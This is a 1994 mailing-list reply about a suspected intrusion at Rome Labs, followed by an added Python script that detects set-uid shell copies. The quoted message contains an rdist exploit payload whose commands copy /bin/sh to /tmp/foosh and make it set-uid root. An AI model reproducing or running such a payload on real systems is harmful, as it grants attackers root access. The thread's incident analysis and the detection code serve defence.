Re: Possible virus from Rome labs

Aggelos D. Keromitis (kermit@ics.forth.gr)
Thu, 31 Mar 1994 12:54:03 +0300

In message <199403310455.UAA15234@merde.dis.org>, Evil Pete writes:
>sounds like Crackers to me, not a virus.
>
Could be, but that should be easy to find out...

>if foosh contains some thing like
>
> Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaa
> Scp /bin/sh /tmp/foosh
> Schmod 4755 /tmp/foosh
>
>
>then it was something a person used to get root through an old hole in rdist
>(when I looked for the file foosh I found it in my directory of security toys)
>
>
>as for jnk.tmp I am not sure yet.
>
Besides, they could have a virus that exploits that bug (or maybe some others too, like the evq driver) so as to infect more files.
-Aggelos
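
An added example, not part of the original thread or written by either poster: one way to check a host for the artifact described above, a set-uid copy of a shell left in a world-writable directory such as /tmp/foosh. The function name and the list of reference shells are assumptions made for this illustration.

```python
import filecmp
import os
import stat

# Assumption: reference shells to compare against; adjust for the system.
DEFAULT_SHELLS = ("/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh")


def find_setuid_shell_copies(root, shells=DEFAULT_SHELLS):
    """Return sorted [(path, owner_uid, matched_shell_or_None)] for every
    set-uid regular file under root. matched_shell is the reference shell
    whose bytes are identical to the file, or None when the file is set-uid
    but matches none of the reference shells."""
    refs = [os.path.realpath(s) for s in shells if os.path.isfile(s)]
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow planted symlinks
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            match = None
            for ref in refs:
                try:
                    if filecmp.cmp(path, ref, shallow=False):  # byte compare
                        match = ref
                        break
                except OSError:
                    pass
            findings.append((path, st.st_uid, match))
    return sorted(findings)


if __name__ == "__main__":
    for path, uid, match in find_setuid_shell_copies("/tmp"):
        kind = f"copy of {match}" if match else "set-uid file"
        print(f"{path}: owner uid {uid}, {kind}")
```

A hit owned by uid 0 that matches a shell is the case the quoted file contents would produce; set-uid files that match no reference shell are still reported so they can be reviewed by hand.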